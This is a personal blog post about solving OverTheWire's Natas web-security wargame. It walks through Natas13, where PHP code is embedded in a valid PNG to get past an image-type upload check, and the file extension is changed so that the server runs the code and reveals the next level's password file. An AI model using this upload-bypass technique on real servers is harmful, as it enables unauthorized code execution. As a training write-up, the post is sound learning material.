/ technical

How much do I really know about Web Security?

Today I moved onto the next game series on OverTheWire (are they really games?), Natas. Thanks to my friend, Sam, I realized that this was the reverse spelling of 'Satan'. More importantly, the series is about web security. I could not have been more excited this morning to realize that I would be exploiting a website on an Apache server.

I have had a lot of security tips and tricks engrained into me, but I have never actually tried to abuse a lack of security. I have never even tried to break one of my own sites. This has been all I ever wanted.

The first few levels of Natas were basically 'Can you use the Inspect tool?'. I blew through these (grinning the whole time). After that, abusing insecure directory permissions. A little later, manually setting cookies. It was pretty clear that the servers were intentionally configured poorly.

Then, PHP was introduced. Again, more abuse of bad directory permissions. The first real challenge for me was when a cookie was encrypted using XOR with a secret key. I vaguely remembered from my college cryptography course that you can recover the key from XOR somehow. After some Googling, the answer wasn't too hard, but it did require some programming (to my surprise, I thought this series was going to be easy).

I would like to go into detail on one of the challenges I completed today (I finished 15/32).

Natas13

For this challenge, I was presented with a file-upload form, and the ability to see the PHP code code for the page (I imagine real hackers don't get this privilege). Anyway, only image files are allowed to be uploaded and it was checked with exif_imagetype(). In summary, PHP checks the first few bytes to ensure it's an image. There's no getting around this.

Luckily, I accidentally learned about the PNG file format during my research of an earlier challenge. Basically, the first eight bytes of a PNG must be the following:

137 80 78 71 13 10 26 10

Basically, the first byte has it's most significant bit set, followed by the letters 'PNG', a carriage return, a line-feed, ^Z, and another line-feed. As someone who knows almost nothing about file encodings, this was extremely fascinating to me. To see just how cool this is, check out the hexdump of this 1x1 PNG:

nick@nick-dev:~/Downloads$ xxd pixel.png 
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .PNG........IHDR
00000010: 0000 0001 0000 0001 0103 0000 0025 db56  .............%.V
00000020: ca00 0000 0467 414d 4100 00b1 8f0b fc61  .....gAMA......a
00000030: 0500 0000 0173 5247 4200 aece 1ce9 0000  .....sRGB.......
00000040: 0020 6348 524d 0000 7a26 0000 8084 0000  . cHRM..z&......
00000050: fa00 0000 80e8 0000 7530 0000 ea60 0000  ........u0...`..
00000060: 3a98 0000 1770 9cba 513c 0000 0006 504c  :....p..Q<....PL
00000070: 5445 ffff ffff ffff 557c f56c 0000 0001  TE......U|.l....
00000080: 7452 4e53 0040 e6d8 6600 0000 0162 4b47  tRNS.@..f....bKG
00000090: 4400 8805 1d48 0000 0009 7048 5973 0000  D....H....pHYs..
000000a0: 0048 0000 0048 0046 c96b 3e00 0000 0a49  .H...H.F.k>....I
000000b0: 4441 5408 d763 6000 0000 0200 01e2 21bc  DAT..c`.......!.
000000c0: 3300 0000 2574 4558 7464 6174 653a 6372  3...%tEXtdate:cr
000000d0: 6561 7465 0032 3031 322d 3039 2d31 3754  eate.2012-09-17T
000000e0: 3135 3a32 343a 3233 2b30 323a 3030 f856  15:24:23+02:00.V
000000f0: a611 0000 0025 7445 5874 6461 7465 3a6d  .....%tEXtdate:m
00000100: 6f64 6966 7900 3230 3038 2d30 312d 3032  odify.2008-01-02
00000110: 5432 333a 3133 3a30 382b 3031 3a30 3084  T23:13:08+01:00.
00000120: 186b 3e00 0000 0049 454e 44ae 4260 82    .k>....IEND.B`.

Notice that the first eight bytes (in hexadecimal) are 8950, 4e47, 0d0a, and 1a0a. You will notice that these line up with what I said they should earlier: 89 in hexadecimal is equivalent to 137 in decimal, 50 in hexadecimal is equivalent to 80 in decimal (the letter 'P' using ASCII encoding), so on and so forth...

So, I wrote a PHP script, and manually inserted those eight bytes by pasting them into Vim. However, when I did a Hexdump of the file, the first byte was something different. No matter, I am bash expert now. So I googled how to delete the first byte of a file. Turns out you can do it with dd:

dd if=source.php of=target.php ibs=1 skip=1

ibs is the length of bytes by which to read. skip is how many ibs to skip at the beginning of the file. I learned this from man. I am proud of myself.

Anyway, the command worked. I had a "PNG" file. However, when I uploaded it to the server, it said my PNG file was corrupted with ASCII text. I wasn't sure how to fix that, so I changed tactics.

I took that 1x1 png image (from earlier), opened it in vim, and wrote PHP. Guess what? Yeah, it worked. This is what it looks like in vim:

pwned-2

The trick of the game, is that it uploads your file to a random path on the server, and then gives you the link to access the file. It also tries to set the extension to '.jpg', but that was easily changed by manipulating the form input on the page. After requesting the file from the server, the password at /etc/natas_webpass/natas14 was displayed. Yay.

A last note on this level: None of the previous levels had made me worry about my own server security at all. They were mostly about code injection. I am always careful about that. However, this level was really interesting. I knew that executing code in a PNG was possible but I always thought it was hard or something — But that isn't the case.

Conclusion

I can't emphasize enough how excited I am to be on the offense instead of defense. I have actually been given the ability to just play with security, and without having to set it up myself. Sure, I'm practically handed the solutions, but the challenges seem like an amazing introduction. I really feel like I'm learning the foundations.

My goal is that I will eventually learn enough to exploit my own server setups. I mostly rely on default DigitalOcean configuration. How good is it? Can I hack myself? I'm really curious to find out.

If you are interested in trying out this challenge for yourself, go to the Natas page on OverTheWire, and read the instructions. If you want to read more about these wargames, you can read my previous blog post.

On a final note: It has been much harder to get into the hacker mindset than I had anticipated. I got stuck on at least three of the problems today and had to turn to Google for some assistance. I'm still moving along, though, and I am enthusiastic about the future.